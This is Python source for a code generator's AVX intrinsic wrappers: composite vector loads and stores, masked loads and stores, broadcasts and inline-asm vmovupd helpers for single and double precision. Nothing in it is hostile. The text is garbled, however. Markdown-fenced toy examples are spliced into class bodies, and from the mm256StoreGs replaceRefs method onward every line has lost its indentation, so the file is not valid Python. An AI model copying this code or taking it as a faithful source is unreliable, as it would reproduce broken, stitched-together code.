        isCompact = self.isCompact
        content = None
        if len(mrmap) == 1:
            if mrmap == [tuple(range(self.reglen))]:
                content = mm256BroadcastSs(pointer, zeromask)
            # if mrmap[0] == 0:
            else:
                vmask = self.reglen * [0]
                vmask[mrmap[0]] = 1
                maskPtr = pointer if isinstance(pointer.ref, ScalarsReference) else Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0])))
                content = mm256MaskloadPs(maskPtr, vmask, zeromask)
            # else:
            #     zm_i = [0] if mrmap[0] in zeromask else []
            #     ei = mmLoadSs(pointer, zm_i)
            #     pos = 4*[1]
            #     pos[mrmap[0]] = 0
            #     pos.reverse()
            #     content = mmShufflePs(ei, ei, tuple(pos))
        # elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
        elif mrmap == range(len(mrmap)):
            l = len(mrmap)
            if isCompact or horizontal:
                if l == self.reglen:
                    content = mm256LoaduPs(pointer, zeromask)
                else:
                    vmask = self.reglen * [0]
                    vmask[:l] = l * [1]
                    content = mm256MaskloadPs(pointer, vmask, zeromask)
            else:  # Incompact case should appear only if vertical
                vmask = [1] + 7 * [0]
                es = [mm256MaskloadPs(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))), vmask) for i in range(l)]
                if l == 2:
                    content = mm256UnpackloPs(es[0], es[1])
                elif l == 3:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    content = mm256ShufflePs(t0, es[2], (1, 0, 1, 0))
                elif l == 4:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    t1 = mm256UnpackloPs(es[2], es[3])
                    content = mm256ShufflePs(t0, t1, (1, 0, 1, 0))
                elif l == 5:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    t1 = mm256UnpackloPs(es[2], es[3])
                    t2 = mm256ShufflePs(t0, t1, (1, 0, 1, 0))
                    content = mm256Permute2f128Ps(t2, es[4], [0, 0, 1, 0, 0, 0, 0, 0])
                elif l == 6:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    t1 = mm256UnpackloPs(es[2], es[3])
                    t2 = mm256ShufflePs(t0, t1, (1, 0, 1, 0))
                    t3 = mm256UnpackloPs(es[4], es[5])
                    content = mm256Permute2f128Ps(t2, t3, [0, 0, 1, 0, 0, 0, 0, 0])
                elif l == 7:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    t1 = mm256UnpackloPs(es[2], es[3])
                    t2 = mm256ShufflePs(t0, t1, (1, 0, 1, 0))
                    t3 = mm256UnpackloPs(es[4], es[5])
                    t4 = mm256ShufflePs(t3, es[6], (1, 0, 1, 0))
                    content = mm256Permute2f128Ps(t2, t4, [0, 0, 1, 0, 0, 0, 0, 0])
                elif l == 8:
                    t0 = mm256UnpackloPs(es[0], es[1])
                    t1 = mm256UnpackloPs(es[2], es[3])
                    t2 = mm256ShufflePs(t0, t1, (1, 0, 1, 0))
                    t3 = mm256UnpackloPs(es[4], es[5])
                    t4 = mm256UnpackloPs(es[6], es[7])
                    t5 = mm256ShufflePs(t3, t4, (1, 0, 1, 0))
                    content = mm256Permute2f128Ps(t2, t5, [0, 0, 1, 0, 0, 0, 0, 0])
        elif any(map(lambda rng: mrmap == rng, [range(i, j + 1) for i in range(self.reglen) for j in range(self.reglen) if i < j])):
            vmask = self.reglen * [0]
            for i in mrmap:
                vmask[i] = 1
            content = mm256MaskloadPs(Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0]))), vmask, zeromask)
        if content is None:
            raise ValueError('mm256LoadGs does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
        return content
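    # The mask construction used throughout generateContent can be sketched
    # without the IR classes: for any lane map the wrapper builds an 8-entry
    # 0/1 vector selecting the active float32 lanes of the ymm register
    # (a plain-Python illustration, not slingen code):

```python
REGLEN = 8  # float32 lanes in a 256-bit ymm register

def lane_mask(mrmap):
    # 0/1 mask over the 8 lanes, as passed to mm256MaskloadPs above
    vmask = REGLEN * [0]
    for i in mrmap:
        vmask[i] = 1
    return vmask

print(lane_mask(range(3)))     # → [1, 1, 1, 0, 0, 0, 0, 0]
print(lane_mask(range(2, 5)))  # → [0, 0, 1, 1, 1, 0, 0, 0]
```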
    def computeSym(self, nameList):
        # NOTE: the original passed `self` as an extra positional argument here
        return self.content.computeSym(nameList)

    def getZMask(self):
        return self.content.getZMask()

    def unparse(self, indent):
        content = self.content
        res = content.unparse(indent)
        # res += "\n" + DebugPrint(["\""+getReference(icode, self.pointer.mat).physLayout.name+"\"", "\" [ \"", str(self.pointer.at[0]), "\" , \"", str(self.pointer.at[1]), "\" ] at line \"", "__LINE__"]).unparse(indent)
        # if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
        #     content.env = self.env
        #     self.analysis.propagateEnvToSrcs(content)
        #     content = content.align(self.analysis)
        return res

    def setIterSet(self, indices, iterSet):
        super(mm256LoadGs, self).setIterSet(indices, iterSet)
        self.setSpaceReadMap(indices, iterSet)

    def printInst(self, indent):
        # return 'mmLoadGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, self.content.printInst(indent))
        return 'mm256LoadGs(%r, %r, %s)' % (self.pointer, self.mrmap, self.orientation)

    def align(self, analysis):
        self.analysis = analysis
        return self

    def __eq__(self, other):
        return isinstance(other, VecAccess) and self.reglen == other.reglen and self.pointer == other.pointer and self.mrmap == other.mrmap and (self.horizontal == other.horizontal or self.isCompact and other.isCompact)

    def __hash__(self):
        return hash((hash('mm256LoadGs'), self.pointer.mat, self.pointer.at, str(self.mrmap), self.orientation))
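    # The __eq__/__hash__ pair above is what lets identical vector accesses
    # collapse to a single register during scalar replacement: equal loads
    # hash alike, so set/dict-based deduplication keeps only one. A toy model
    # of that mechanism (ToyLoad is illustrative, not the IR class):

```python
class ToyLoad(object):
    def __init__(self, at, mrmap):
        self.at, self.mrmap = at, tuple(mrmap)
    def __eq__(self, other):
        return isinstance(other, ToyLoad) and self.at == other.at and self.mrmap == other.mrmap
    def __hash__(self):
        return hash(('ToyLoad', self.at, self.mrmap))

# two accesses to (0, 0) with the same lane map collapse into one entry
loads = {ToyLoad((0, 0), range(8)), ToyLoad((0, 0), range(8)), ToyLoad((1, 0), range(8))}
print(len(loads))  # → 2
```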


class mm256StoreGs(MovStatement):
    '''Wrapper of a vector store instruction.
    Useful when we want to represent a composite store instruction as a single logical instruction and then have it
    easily replaced by a scalar during scalar replacement.
    '''
    def __init__(self, src, dst, mrmap, isCompact=True, isCorner=False, horizontal=True):
        super(mm256StoreGs, self).__init__()
        self.srcs += [src]
        self.mrmap = mrmap
        dstptr = dst if isinstance(dst, Pointer) else dst.pointer
        self.dst = VecDest(dstptr, 8, mrmap, horizontal, isCompact, isCorner)
        self.horizontal = horizontal
        self.isCompact = isCompact
        self.isCorner = isCorner
        self.orientation = 'horizontal' if horizontal else 'vertical'
        self.reglen = 8
        self.analysis = None
        self._content = None

    @property
    def content(self):
        if self._content is None:
            self._content = self.generateContent()
        return self._content
    def generateContent(self):
        dst = self.dst.pointer
        src = self.srcs[0]
        mrmap = self.mrmap
        horizontal = self.horizontal
        isCompact = self.isCompact
        content = None
        if len(mrmap) == 1:
            vmask = 8 * [0]
            vmask[mrmap[0]] = 1
            content = [mm256MaskstorePs(vmask, src, dst)]
        elif mrmap == range(len(mrmap)):
            l = len(mrmap)
            if isCompact or horizontal:
                if l == self.reglen:
                    content = [mm256StoreuPs(src, dst)]
                else:
                    vmask = self.reglen * [0]
                    vmask[:l] = l * [1]
                    content = [mm256MaskstorePs(vmask, src, dst)]
            else:  # Incompact case should appear only if vertical
                content = []
                vmask = [1] + 7 * [0]
                pcs = [Pointer((dst.mat, (dst.at[0] + i, dst.at[1]))) for i in range(l)]
                if l == 2:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (2, 2, 2, 1)), pcs[1]))
                elif l == 3:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (3, 3, 3, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (3, 3, 3, 2)), pcs[2]))
                elif l == 4:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[2]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[3]))
                elif l == 5:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[2]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[3]))
                    lane1 = mm256Permute2f128Ps(src, src, [1, 0, 0, 0, 0, 0, 0, 1])
                    content.append(mm256MaskstorePs(vmask, lane1, pcs[4]))
                elif l == 6:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[2]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[3]))
                    lane1 = mm256Permute2f128Ps(src, src, [1, 0, 0, 0, 0, 0, 0, 1])
                    content.append(mm256MaskstorePs(vmask, lane1, pcs[4]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (2, 2, 2, 1)), pcs[5]))
                elif l == 7:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[2]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[3]))
                    lane1 = mm256Permute2f128Ps(src, src, [1, 0, 0, 0, 0, 0, 0, 1])
                    content.append(mm256MaskstorePs(vmask, lane1, pcs[4]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3, 3, 3, 1)), pcs[5]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3, 3, 3, 2)), pcs[6]))
                elif l == 8:
                    content.append(mm256MaskstorePs(vmask, src, pcs[0]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[1]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[2]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[3]))
                    lane1 = mm256Permute2f128Ps(src, src, [1, 0, 0, 0, 0, 0, 0, 1])
                    content.append(mm256MaskstorePs(vmask, lane1, pcs[4]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0, 0, 0, 1)), pcs[5]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0, 0, 0, 2)), pcs[6]))
                    content.append(mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0, 0, 0, 3)), pcs[7]))
        if content is None:
            raise ValueError('mm256StoreGs does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
        return content
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal, isAligned=False):
return reglen == 8
@staticmethod
def getStore(src, dst):
mrmap = dst.mrmap
if isinstance(mrmap, int):
mrmap = [mrmap]
return mm256StoreGs(src, dst, mrmap, dst.isCompact, dst.isCorner, dst.horizontal)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)[:len(self.mrmap)]
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# for instr in content:
# instr.env = self.env
# self.analysis.propagateEnvToSrcs(instr)
# content = [instr.align(self.analysis) for instr in content]
return '\n'.join(instr.unparse(indent) for instr in content)
def printInst(self, indent):
# return 'mmStoreGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, ','.join([instr.printInst(indent) for instr in self._content]))
return 'mm256StoreGs(%r, %r, %r, %s)' % (self.dst, self.srcs[0], self.mrmap, self.orientation)
def align(self, analysis):
self.analysis = analysis
return self
class mm256LoadGd(RValue, VecAccess):
''' Wrapper of a vector load instruction.
Useful when we want to represent a composite load instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, pointer, mrmap, isCompact=True, isCorner=False, horizontal=True, zeromask=None, not_using_mask=None):
super(mm256LoadGd, self).__init__()
self.pointer = pointer
self.mrmap = mrmap
self.isCompact = isCompact
self.isCorner = isCorner
self.horizontal = horizontal
self.orientation = 'horizontal' if horizontal else 'vertical'
self.zeromask = [] if zeromask is None else zeromask
self.not_using_mask = [False]*len(mrmap) if not_using_mask is None else not_using_mask
self.reglen = 4
self.analysis = None
self._content = None
@property
def content(self):
if self._content is None:
self._content = self.generateContent()
return self._content
def generateContent(self):
mrmap = self.mrmap
pointer = self.pointer
zeromask = self.zeromask
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
if mrmap == [tuple(range(self.reglen))]:
content = mm256BroadcastSd(pointer, zeromask)
elif mrmap[0] == 0:
content = mm256CastPd128Pd256(mmLoadSd(pointer))
else:
vmask = self.reglen*[0]
vmask[mrmap[0]] = 1
maskPtr = pointer if isinstance(pointer.ref, ScalarsReference) else Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0])))
content = mm256MaskloadPd(maskPtr, vmask, zeromask)
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = mm256LoaduPd(pointer, zeromask)
# content = asm256LoaduPd(pointer, zeromask)
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = mm256MaskloadPd(pointer, vmask, zeromask)
else: # Non-compact case should occur only with vertical layout
# vmask = [1] + 3*[0]
# es = [ mm256MaskloadPd(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))), vmask) for i in range(l) ]
es = [ mm256CastPd128Pd256(mmLoadSd(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))))) for i in range(l) ]
if l == 2:
content = mm256ShufflePd(es[0], es[1], [0,0,0,0])
elif l==3:
content = mm256Permute2f128Pd(mm256UnpackloPd(es[0], es[1]), es[2], [0,0,1,0,0,0,0,0])
elif l==4:
content = mm256Permute2f128Pd(mm256UnpackloPd(es[0], es[1]), mm256UnpackloPd(es[2], es[3]), (0,0,1,0,0,0,0,0))
elif any(mrmap == range(i, j+1) for i in range(self.reglen) for j in range(self.reglen) if i < j):
vmask = self.reglen*[0]
for i in mrmap:
vmask[i] = 1
content = mm256MaskloadPd(Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0]))), vmask, zeromask)
if content is None:
raise ValueError('mm256LoadGd does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
return content
def computeSym(self, nameList):
return self.content.computeSym(nameList)
def getZMask(self):
return self.content.getZMask()
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# content.env = self.env
# self.analysis.propagateEnvToSrcs(content)
# content = content.align(self.analysis)
return content.unparse(indent)
def setIterSet(self, indices, iterSet):
super(mm256LoadGd, self).setIterSet(indices, iterSet)
self.setSpaceReadMap(indices, iterSet)
def printInst(self, indent):
# return 'mmLoadGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, self.content.printInst(indent))
return 'mm256LoadGd(%r, %r, %r, %s, isCompact=%s)' % (self.pointer, self.mrmap, self.not_using_mask, self.orientation, str(self.isCompact))
def align(self, analysis):
self.analysis = analysis
return self
def __eq__(self, other):
return isinstance(other, VecAccess) and self.reglen == other.reglen and self.pointer == other.pointer and self.mrmap == other.mrmap and (self.horizontal == other.horizontal or (self.isCompact and other.isCompact))
def __hash__(self):
return hash((hash('mm256LoadGd'), self.pointer.mat, self.pointer.at, str(self.mrmap), self.orientation, self.isCompact))
class mm256StoreGd(MovStatement):
'''Wrapper of a vector store instruction.
Useful when we want to represent a composite store instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, src, dst, mrmap, isCompact=True, isCorner=False, horizontal=True):
super(mm256StoreGd, self).__init__()
self.srcs += [src]
self.mrmap = mrmap
dstptr = dst if isinstance(dst, Pointer) else dst.pointer
self.dst = VecDest(dstptr, 4, mrmap, horizontal, isCompact, isCorner)
self.horizontal = horizontal
self.isCompact = isCompact
self.isCorner = isCorner
self.orientation = 'horizontal' if horizontal else 'vertical'
self.reglen = 4
self.analysis = None
self._content = None
@property
def content(self):
if self._content is None:
self._content = self.generateContent()
return self._content
def generateContent(self):
dst = self.dst.pointer
src = self.srcs[0]
mrmap = self.mrmap
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
if mrmap[0] == 0:
content = [ mmStoreSd(mm256CastPd256Pd128(src), dst) ]
else:
vmask = self.reglen*[0]
vmask[mrmap[0]] = 1
content = [mm256MaskstorePd(vmask, src, Pointer((dst.mat, (dst.at[0], dst.at[1]-mrmap[0]))))]
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = [mm256StoreuPd(src, dst)]
# content = [asm256StoreuPd(src, dst)]
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = [mm256MaskstorePd(vmask, src, dst)]
else: # Non-compact case should occur only with vertical layout
content = []
vmask = [1] + 3*[0]
pcs = [ Pointer((dst.mat, (dst.at[0] + i, dst.at[1]))) for i in range(l) ]
if l == 2:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
elif l==3:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
content.append( mm256MaskstorePd(vmask, mm256Permute2f128Pd(src, src, [1,0,0,0,0,0,0,1]), pcs[2]) )
elif l==4:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
invlane = mm256Permute2f128Pd(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePd(vmask, invlane, pcs[2]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(invlane, invlane, [0,0,0,1]), pcs[3]) )
elif any(mrmap == range(i, j+1) for i in range(self.reglen) for j in range(self.reglen) if i < j):
vmask = self.reglen*[0]
for i in mrmap:
vmask[i] = 1
content = [mm256MaskstorePd(vmask, src, Pointer((dst.mat, (dst.at[0], dst.at[1]-mrmap[0]))))]
# elif mrmap == [1, 2]:
# if horizontal or isCompact:
# v1_2 = mmShufflePs(src, src, (3,3,2,1))
# content = [mmStorelPi(v1_2, PointerCast("__m64", dst))]
# elif mrmap == [2, 3]:
# if horizontal or isCompact:
# content = [mmStorehPi(src, PointerCast("__m64", dst))]
# elif mrmap == [1, 2, 3]:
# if horizontal or isCompact:
# pointer2 = Pointer((dst.mat, (dst.at[0], dst.at[1] + 1)))
# e1 = mmShufflePs(src, src, (1,1,1,1))
# content = [mmStoreSsNoZeromask(e1, dst), mmStorehPi(src, PointerCast("__m64", pointer2))]
if content is None:
raise ValueError('mm256StoreGd does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
# #DEBUG
# pi,pj=0,0
# for _ in range(len(mrmap)):
# content.append(DebugPrint(["\"Storing "+getReference(icode, dst.mat).physLayout.name+"\"", "\" [ \"", str(dst.at[0]+pi), "\" , \"", str(dst.at[1]+pj), "\" ] at line \"", "__LINE__"]));
# if horizontal:
# pj += 1
# else:
# pi += 1
# #DEBUG
return content
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal, isAligned=False):
return reglen == 4
@staticmethod
def getStore(src, dst):
mrmap = dst.mrmap
if isinstance(mrmap, int):
mrmap = [mrmap]
return mm256StoreGd(src, dst, mrmap, dst.isCompact, dst.isCorner, dst.horizontal)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)[:len(self.mrmap)]
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# for instr in content:
# instr.env = self.env
# self.analysis.propagateEnvToSrcs(instr)
# content = [instr.align(self.analysis) for instr in content]
return '\n'.join(instr.unparse(indent) for instr in content)
def printInst(self, indent):
# return 'mmStoreGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, ','.join([instr.printInst(indent) for instr in self._content]))
return 'mm256StoreGd(%r, %r, %r, %s, isCompact=%s)' % (self.dst, self.srcs[0], self.mrmap, self.orientation, str(self.isCompact))
def align(self, analysis):
self.analysis = analysis
return self
class mm256LoaduPd(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256LoaduPd, self).__init__()
self.reglen = 4
self.mrmap = [0,1,2,3]
self.zeromask = [0]*self.reglen
if zeromask is not None:
for pos in zeromask:
self.zeromask[pos] = 1
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0'), sympify(p+'_1'), sympify(p+'_2'), sympify(p+'_3') ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_loadu_pd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256LoaduPd( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256LoaduPd) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256LoaduPd"), self.pointer.mat, self.pointer.at))
class asm256LoaduPd(mm256LoaduPd):
def __init__(self, pointer, zeromask=None):
super(asm256LoaduPd, self).__init__(pointer, zeromask)
def unparse(self, indent):
return indent + "_asm256_loadu_pd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "asm256LoaduPd( " + self.pointer.printInst("") + " )"
@staticmethod
def add_func_defs():
f = "static __inline__ __m256d _asm256_loadu_pd(const double* p) {\n"
f += " __m256d v;\n"
f += " __asm__(\"vmovupd %1, %0\" : \"=x\" (v) : \"m\" (*p));\n"
f += " return v;\n}\n"
return [f]
class mm256MaskloadPd(RValue, VecAccess):
def __init__(self, pointer, vecmask, zeromask=None):
super(mm256MaskloadPd, self).__init__()
self.reglen = 4
self.mrmap = []
self.zeromask = []
for m,i in zip(vecmask,range(4)):
self.mrmap += [i] if m else [-1]
self.zeromask += [0] if m else [1]
if zeromask is not None:
for pos in zeromask: # there should be at most one pos == 0 here
self.zeromask[pos] = 1
self.pointer = pointer
self.vecmask = vecmask
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(4)):
res += [sympify(p+'_'+str(i))] if m else [sympify(0)]
return res
def getZMask(self):
return self.zeromask
def unparse(self, indent):
vm = "_mm256_setr_epi64x("
for m,i in zip(self.vecmask,range(4)):
vm += "(__int64)1 << 63" if m else "0"
vm += ", " if i<3 else ")"
return indent + "_mm256_maskload_pd(" + self.pointer.unparse("") + ", " + vm + ")"
def printInst(self, indent):
return indent + "mm256MaskloadPd( " + self.pointer.printInst("") + ", " + str(self.vecmask) + ")"
def __eq__(self, other):
return isinstance(other, mm256MaskloadPd) and self.vecmask == other.vecmask and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256MaskloadPd"), hash(tuple(self.vecmask)), self.pointer.mat, self.pointer.at))
class mm256BroadcastSd(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256BroadcastSd, self).__init__()
self.reglen = 4
self.mrmap = [(0,1,2,3)]
self.zeromask = [0]*self.reglen
if zeromask is not None: # In this case all the positions have to be zero
self.zeromask = [1]*self.reglen
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0'), sympify(p+'_0'), sympify(p+'_0'), sympify(p+'_0') ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_broadcast_sd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256BroadcastSd( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256BroadcastSd) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256BroadcastSd"), self.pointer.mat, self.pointer.at))
class mm256StoreuPd(MovStatement):
mrmap = [0,1,2,3] # static definition of the mem-reg mapping imposed by the store
def __init__(self, src, dst):
super(mm256StoreuPd, self).__init__()
self.dst = VecDest(dst, 4, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 4, self.mrmap)
self.srcs += [ src ]
# self.slen = 4
# self.dlen = 4
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
return reglen == 4 and mrmap == mm256StoreuPd.mrmap
@staticmethod
def getStore(src, dst):
return mm256StoreuPd(src, dst)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)
def unparse(self, indent):
return indent + "_mm256_storeu_pd(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256StoreuPd( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class asm256StoreuPd(mm256StoreuPd):
def __init__(self, src, dst):
super(asm256StoreuPd, self).__init__(src, dst)
def unparse(self, indent):
return indent + "_asm256_storeu_pd(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "asm256StoreuPd( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
@staticmethod
def add_func_defs():
f = "static __inline__ void _asm256_storeu_pd(double* p, const __m256d& v) {\n"
f += "  __asm__(\"vmovupd %1, %0\" : \"=m\" (*p) : \"x\" (v));\n}\n" # store destination must be a memory operand; "=rm" would let the compiler pick a register
return [f]
class mm256MaskstorePd(MovStatement):
def __init__(self, vecmask, src, dst):
super(mm256MaskstorePd, self).__init__()
self.mrmap = []
for m,i in zip(vecmask,range(4)):
self.mrmap += [i] if m else [-1]
self.dst = VecDest(dst, 4, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 4, self.mrmap)
self.srcs += [ src ]
self.vecmask = vecmask
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
itcan = True
for m,i in zip(mrmap,range(4)):
itcan = itcan and (m == i or m == -1)
return reglen == 4 and itcan
@staticmethod
def getStore(src, dst):
vecmask = [ (0 if r == -1 else 1) for r in dst.mrmap ]
vecmask.extend([0 for _ in range(len(dst.mrmap), 4)])
return mm256MaskstorePd(vecmask, src, dst)
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(4)):
res += [src[i]] if m else ["-"]
return res
def unparse(self, indent):
vm = "_mm256_setr_epi64x("
for m,i in zip(self.vecmask,range(4)):
vm += "(__int64)1 << 63" if m else "0"
vm += ", " if i<3 else ")"
return indent + "_mm256_maskstore_pd(" + self.dst.unparse("") + ", " + vm + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256MaskstorePd( " + str(self.vecmask) + ", " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class mm256Set1Pd(RValue):
def __init__(self, src):
super(mm256Set1Pd, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
sym = self.srcs[0].computeSym(nameList)[0]
return [ sym, sym, sym, sym ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
return [ s0ZMask[0], s0ZMask[0], s0ZMask[0], s0ZMask[0] ]
def unparse(self, indent):
return indent + "_mm256_set1_pd(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256Set1Pd( " + self.srcs[0].printInst("") + " )"
class mm256SetPd(RValue):
def __init__(self, src0, src1, src2, src3):
super(mm256SetPd, self).__init__()
self.srcs += [ src0, src1, src2, src3 ]
